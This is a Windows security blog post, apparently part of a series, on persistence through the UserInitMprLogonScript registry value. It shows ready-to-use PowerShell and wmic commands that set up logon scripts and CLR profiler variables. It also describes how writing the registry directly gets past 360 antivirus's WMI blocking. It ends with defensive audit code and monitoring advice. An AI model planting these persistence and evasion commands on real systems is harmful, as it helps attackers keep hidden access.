0x00 Introduction

---

This article continues the series on backdoor exploitation methods, this time looking at Logon Scripts. While researching them I found a particular behaviour: the script executes before the antivirus software has started, so it can bypass the antivirus product's interception of sensitive operations. This article details that technique.

Note:

Some antivirus software starts before Logon Scripts run.

0x01 Overview

---

  • Usage of Logon Scripts
  • Bypassing 360's interception of WMI calls
  • Special Techniques

0x02 Usage of Logon Scripts

---

The idea originates from Adam @ Hexacorn; see:

http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

A brief introduction to using Logon Scripts:

Registry path: HKCU\Environment\

Create a string value: UserInitMprLogonScript

Set it to the absolute path of the bat file: c:\test\11.bat

As shown in the figure below:

[figure omitted]

The content of the bat is as follows:

start calc.exe

Log off and log on again.

11.bat executes and the calculator pops up.

0x03 Bypassing 360's interception of environment-variable modification via WMI

---

The previous article, 'Use CLR to maintain persistence', used wmic to modify environment variables.

The commands were as follows:

wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"

wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"

However, 360 intercepts WMI operations, as shown in the figure below:

[figure omitted]

In fact, adding an environment variable via WMI is equivalent to creating a value under the registry key HKCU\Environment\.

Therefore, the WMI operation can be replaced by writing to the registry directly.

The WMI commands above can be replaced with the following PowerShell code:

New-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null

New-ItemProperty "HKCU:\Environment\" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null
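The claim above is that the WMI route and the registry route end up in the same place. The following PowerShell function, an added example that is not part of the original post, reads the same per-user variable through both views (the Win32_Environment class that wmic drives, and HKCU\Environment) and reports whether they agree. It assumes it runs as the user being inspected and uses the constructed sample name test from this article's own experiment; the function name Compare-UserEnvironmentView is mine.

```powershell
# Added example, not code from the original post.
# Reads one per-user environment variable through the WMI class behind
# 'wmic ENVIRONMENT' and through the HKCU\Environment registry key, to show
# they are two views of the same backing store. That is why a defence that
# only hooks WMI does not stop a direct registry write.
# Assumptions: runs as the user being inspected; 'test' is the constructed
# sample name used in this article's experiment.

function Compare-UserEnvironmentView {
    param([string]$Name = 'test')

    # Win32_Environment reports per-user variables with UserName as DOMAIN\user.
    $owner  = "$env:USERDOMAIN\$env:USERNAME"
    $viaWmi = Get-CimInstance -ClassName Win32_Environment -Filter "Name='$Name'" |
              Where-Object { $_.UserName -eq $owner }

    # Registry view: the key the WMI provider ultimately writes to.
    $viaReg = Get-ItemProperty -Path 'HKCU:\Environment' -Name $Name -ErrorAction SilentlyContinue

    $wmiValue = if ($viaWmi) { $viaWmi.VariableValue } else { $null }
    $regValue = if ($viaReg) { $viaReg.$Name }          else { $null }

    [pscustomobject]@{
        Name             = $Name
        WmiValue         = $wmiValue
        RegistryValue    = $regValue
        SameBackingStore = (($null -ne $wmiValue) -and ($wmiValue -eq $regValue))
    }
}

Compare-UserEnvironmentView -Name 'test'
```

If the variable exists, both columns show the same data and SameBackingStore is True; the practical consequence for defenders is that monitoring has to sit on the registry key (or on userinit.exe's behaviour), not on the WMI provider alone.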

0x04 Special Usage

---

This section is based on an idea of my own.

While researching this technique I had an interesting thought: do Logon Scripts start before other programs?

If so, do they also start before the antivirus software?

Here is my test:

1. Enter the following command in cmd:

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"

As expected, it was blocked.

2. Set up the Logon Script

The contents of 11.bat are as follows:

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"
reg query HKEY_CURRENT_USER\Environment /V test
pause

3. Enable the Logon Script

Registry path: HKCU\Environment\

Create a string value: UserInitMprLogonScript

Set it to the absolute path of the bat file: c:\test\11.bat

Since the WMI call would be blocked, set the value with PowerShell instead:

New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | Out-Null

4. Log off, log back in, and test

If the value test REG_SZ I run faster! is written successfully under HKCU\Environment\, the Logon Script ran before the antivirus software and bypassed its restriction.

The complete operation is shown in the figure below:

[figure omitted]

The test succeeded, confirming the conclusion.

0x05 Defense

---

Monitor the registry value HKCU\Environment\UserInitMprLogonScript.
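A point-in-time check to go with that advice, covering both the Logon Script value from 0x02 and the CLR profiler variables from 0x03. This is an added example, not code from the original post: it walks every user hive loaded under HKEY_USERS (so it has to run from an elevated prompt), looks in each Environment key for the value names this article describes, and for UserInitMprLogonScript also records whether the referenced file exists and its SHA-256 so the finding can be triaged. The function name Find-UserEnvironmentPersistence and the output fields are mine.

```powershell
# Added example, not code from the original post.
# Audits every loaded user hive for the persistence values described in this
# article. Run elevated so HKU:\ exposes other users' hives. The output is an
# object per finding, suitable for a scheduled collection job or manual triage.

function Find-UserEnvironmentPersistence {
    $suspectValues = @(
        'UserInitMprLogonScript',   # Logon Script path read by userinit.exe at logon (0x02)
        'COR_ENABLE_PROFILING',     # CLR profiler switch (0x03)
        'COR_PROFILER'              # CLR profiler CLSID (0x03)
    )

    # HKU: is not mapped by default; map it once.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }

    foreach ($hive in Get-ChildItem -Path 'HKU:\') {
        # *_Classes hives hold file associations, not the Environment key.
        if ($hive.PSChildName -like '*_Classes') { continue }

        $envKey = Join-Path -Path $hive.PSPath -ChildPath 'Environment'
        if (-not (Test-Path -Path $envKey)) { continue }

        $props = Get-ItemProperty -Path $envKey
        foreach ($name in $suspectValues) {
            $prop = $props.PSObject.Properties[$name]
            if ($null -eq $prop) { continue }

            $fileExists = $null
            $sha256     = $null
            if ($name -eq 'UserInitMprLogonScript') {
                # The data is the absolute path of the script to be run at logon.
                $fileExists = Test-Path -LiteralPath $prop.Value -PathType Leaf
                if ($fileExists) {
                    $sha256 = (Get-FileHash -LiteralPath $prop.Value -Algorithm SHA256).Hash
                }
            }

            [pscustomobject]@{
                UserSid    = $hive.PSChildName
                ValueName  = $name
                Data       = $prop.Value
                FileExists = $fileExists
                Sha256     = $sha256
            }
        }
    }
}

$findings = @(Find-UserEnvironmentPersistence)
if ($findings.Count -gt 0) {
    $findings | Format-Table -AutoSize
} else {
    'No Logon Script or CLR profiler values found in any loaded user hive.'
}
```

A scan like this only sees hives that are currently loaded, so it complements rather than replaces real-time monitoring: a Sysmon RegistryEvent (value set) rule on a TargetObject ending in \Environment\UserInitMprLogonScript, or Windows object-access auditing on the same key, catches the write at the moment it happens regardless of whether it arrived via WMI, PowerShell or reg.exe.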

0x06 Summary

---

This article tests the usage of Logon Scripts and introduces a special application: Logon Scripts can execute before antivirus software, bypassing its interception of sensitive operations.

From a defensive perspective, this behaviour deserves continued vigilance.